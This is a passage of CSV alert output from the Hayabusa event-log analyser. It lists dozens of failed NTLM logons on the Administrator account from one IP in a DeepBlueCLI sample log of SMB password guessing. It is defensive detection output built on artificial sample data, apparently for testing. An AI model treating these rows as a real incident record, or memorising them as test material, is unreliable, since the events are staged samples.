Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLKVR3mW3g3utO4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNm4tVG8bV7e9gbB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JtU0PCr9K5DXFYV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.622 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CH3BWNPEWlw52Gb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vQTYqFKBz6YEWhF6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.708 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkj3u8ODgLD7xQ5R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.758 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9uyze1uO0zuNNUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.803 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmL15i3edXHcUamI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.840 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7xjFRjv9rDhiXJ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.880 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6BmQhVEv8g7EKu1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOMmG87cDO1NFg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.963 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO55KfkORhxFORvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D64wDbqkqmzWuUSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sIDgNIlGA0cOkBOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.082 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i0kXPQ6s7CGe4QGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HW5jP389jmqSkzF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.186 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enhsof25BdDPcI2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4acsPMLUJRrT7mmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.272 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hi1dzny6hpyr5N3d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.305 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RlPVBSnDMlE0QZaJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th72TwMoRXtDVWge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.387 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGTTiJSkErjzoUUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyzZwNLltF0cYnai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gYWVQ6mCqyBfDm3m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.505 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rg2x2lv9JeS5Bb6l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.536 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fU28NKC3WYxFGbMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUWDXgnogGDXizWj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXhAtnNcQKOIsuGS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.672 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cKfrJwI3OGdjL4af | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VdekC160hU7YzrK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.773 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enOBuzd6jwu8rZCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.812 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAjLjDlZSps5D49t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rY6CONLBVygSTnY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.883 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6FIHgz2yqqbD9zfV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d82RRXgSmZdnfa8I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:03.968 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xA3ZWnWc9CoGeKpm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvSYKi8KvEtnmSbs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IvxXI1u0AwtNHNSU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OFIy6Cps3Rm87Kqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.135 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: slL3aPBnZl3lVJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.171 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O98P1oP3AU4lZp2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.217 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EZZ7wIJNZ0CG7fMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.268 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7RhwHCqXQytvcaom | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xumaxbBEMZqL6pPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ur1yZIwgB3ecNJGw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.397 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAuGcKYRcLe0z3bl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.436 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmMi0edfBJ8KoJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.480 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnoKbUb9jiqJD7t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hBeWGNkWTSp3nje8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.565 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2iwM6jPgNjZ3q5qb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xdkrA9Kwzero8eSk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tb2ZvuJMxOfsxIT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PBMBRPdATYpLNmyI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.740 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P1CKprAPSw4hgiBB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8qtzwuGJfQG4XB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.833 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: auOf2GwkoymLh4bC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.880 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YcMYQ4sA2GfMwCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.916 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YL1iM6WUtZIjIoTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:04.959 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7ruxdEGdeP3RLqF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZFXBpUJzafGYIggt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MC1K9nNLupH0NuSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rVfBLm10US9II19 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SBhAVHHtR7lZ1C3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKuUH8lMELYHibxF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.338 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UytgJLBtGRMCf3ar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yno9399gUI2oBr4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbsqE98qy27Sp0UJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.495 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RjXtDnXvCXSJ2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EdRXJJ1RCl8n9bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tnwGNp2ncfcBlFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iGKEloPpd6CtrSlg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBvHz5iKl0dl97xj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.687 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0FPIXCc5FlKMLaL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.725 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c7Li2NqHgSIetZka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.764 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MuIRFiXBUqrJeMbx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.808 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zxJNU05FkPwhcYxj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TWifHaaBiypAGkKi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9VByeO8vHGSOJK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:05.932 